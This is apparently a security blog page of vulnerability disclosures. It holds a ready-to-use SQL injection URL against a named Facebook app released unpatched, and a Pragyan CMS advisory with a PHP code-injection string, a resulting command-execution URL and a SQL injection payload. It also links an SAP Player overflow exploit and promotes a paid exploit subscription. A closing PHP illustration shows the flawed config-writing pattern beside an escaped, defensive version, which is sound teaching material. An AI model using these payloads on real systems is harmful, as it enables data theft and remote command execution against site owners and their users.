Here is a working exploit PoC for CVE-2014-6352, the OLE Remote Code Execution Vulnerability. It is available through our exploit subscription and binary analysis program.
Thursday, October 23, 2014
Thursday, April 19, 2012
Wednesday, April 18, 2012
Sunday, February 12, 2012
Tuesday, July 5, 2011
SAP Player 0.9 (.m3u) universal
This exploit uses a direct return address. It is not the SEH version.
http://packetstormsecurity.org/files/view/102792/sapplayer-overflow.py.txt
Monday, March 21, 2011
Another vulnerability in Facebook apps!
This is the second SQL injection we found in Facebook apps.
We tried to contact developers but got no response from them. So we decided to release the vulnerability.
Note:: There are a few more Facebook apps which we found to be vulnerable to SQL injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.
A proof of concept of the vulnerability can be seen at::
http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Wednesday, March 9, 2011
SQL Injection in Facebook applications!
We found a vulnerability in 2 Facebook applications. One is patched now, so we are disclosing the vulnerability.
There was a SQL injection vulnerability in apps.facebook.com
Vendor:: twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control
It was possible to extract all data from all databases located on that server.
Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from vendor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure
Saturday, February 26, 2011
Pragyan CMS v 3.0 multiple vulnerabilities!
During Pragyan's hacking challenge we found these vulnerabilities in their open source CMS.
#Pragyan CMS v 3.0 multiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,
abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0
Technical Description
1) Code execution in INSTALL/install.php
The script does not correctly validate the entered fields.
It is possible to write the following string into the password field:
");echo exec($_GET["a"]);echo ("
or into other fields with JavaScript turned off.
cms/config.inc.php will then contain the code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.
EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
2) SQL injection
- Get the MySQL version. EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--
Solution
Update to Pragyan CMS 3.0 rev.274
Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclosure
Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/
Abhishek Lyall
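The config-writing flaw from item 1 of the advisory above, next to one way to close it. This is an added illustration, not Pragyan CMS code and not the rev.274 patch; all function names are hypothetical, and the benign sample password is constructed.

```php
<?php
// Added illustration; not Pragyan CMS code. All function names are hypothetical.

// Flawed pattern: the raw form value is pasted between double quotes,
// so a value containing "); ends the define() call early.
function render_define_unsafe(string $name, string $value): string
{
    return 'define("' . $name . '","' . $value . '");';
}

// Hardened pattern: var_export() emits a correctly escaped PHP string
// literal, and the constant name must match a strict pattern.
function render_define_safe(string $name, string $value): string
{
    if (!preg_match('/\A[A-Z][A-Z0-9_]*\z/', $name)) {
        throw new InvalidArgumentException('unexpected config key');
    }
    return 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ');';
}

// Counts statement terminators in a generated line using PHP's own
// tokenizer; semicolons inside string literals are not counted.
function statement_count(string $phpLine): int
{
    $count = 0;
    foreach (token_get_all('<?php ' . $phpLine) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// Inputs: a constructed benign password, then the string quoted in the advisory.
$samples = [
    'S3cret-pass',
    '");echo exec($_GET["a"]);echo ("',
];

foreach ($samples as $value) {
    $unsafe = render_define_unsafe('MYSQL_PASSWORD', $value);
    $safe   = render_define_safe('MYSQL_PASSWORD', $value);
    printf("unsafe (%d statement(s)): %s\n", statement_count($unsafe), $unsafe);
    printf("safe   (%d statement(s)): %s\n\n", statement_count($safe), $safe);
}
```

A generated config line that tokenizes to more than one statement is a simple server-side check that a field value escaped its string literal, which matters here because the installer's JavaScript validation can be switched off by the client.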
Wednesday, December 29, 2010

